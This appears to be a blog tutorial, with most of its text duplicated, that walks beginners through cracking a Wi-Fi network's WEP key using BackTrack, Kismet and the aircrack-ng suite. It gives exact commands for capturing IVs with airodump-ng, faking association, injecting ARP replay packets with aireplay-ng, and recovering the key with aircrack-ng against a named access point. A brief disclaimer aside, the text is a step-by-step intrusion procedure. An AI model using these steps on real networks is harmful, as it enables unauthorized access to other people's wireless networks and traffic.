A. SCOPE
This tutorial is intended for user’s with little or no experience with linux or wifi. This tutorial aims to guide you through the process of using it effectively.
B. OVERVIEW
BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.
Tools Overview
Glossary of Terms
Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
C. DISCLAIMER
Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.
STEP 1 :
Monitoring Wireless Traffic With Kismet ( for putting wlan in moniter mode)
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet.
Specify Wireless Interface e-g. waln0
Note in text editor:
broadcast name(essid), also called SSID, in our its ITMIS
mac address(bssid), this is mac of radio interface of AP
channel number
Leave kismet running to leave your wireless adapter in monitor mode.
STEP 2
Collecting Data With Airodump
airodump-ng wlan0 –ivs -w /root/Desktop/ITMIS_RCU
STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e ITMIS -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0
a- Mac of AP
h- Mac of wlan0(laptop)
STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0
STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2. Then type in a terminal:
aircrack-ng -s /root/Desktop/ITMIS_RCU.ivs
This tutorial is intended for user’s with little or no experience with linux or wifi. This tutorial aims to guide you through the process of using it effectively.
B. OVERVIEW
BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.
Tools Overview
- Kismet – a wireless network detector and packet sniffer
- airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
- airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
- aireplay – a tool for forging ARP requests
- aircrack – a tool for decrypting WEP keys
- iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
- macchanger – a tool that allows you to view and/or spoof (fake) your MAC address
Glossary of Terms
- AP: Access Point: a wireless router
- MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
- BSSID: Access Point’s MAC address
- ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
- TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
- WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
- WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption
Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
C. DISCLAIMER
Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.
STEP 1 :
Monitoring Wireless Traffic With Kismet ( for putting wlan in moniter mode)
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet.
Specify Wireless Interface e-g. waln0
Note in text editor:
broadcast name(essid), also called SSID, in our its ITMIS
mac address(bssid), this is mac of radio interface of AP
channel number
Leave kismet running to leave your wireless adapter in monitor mode.
STEP 2
Collecting Data With Airodump
airodump-ng wlan0 –ivs -w /root/Desktop/ITMIS_RCU
STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e ITMIS -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0
a- Mac of AP
h- Mac of wlan0(laptop)
STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0
STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2. Then type in a terminal:
aircrack-ng -s /root/Desktop/ITMIS_RCU.ivs
No comments:
Post a Comment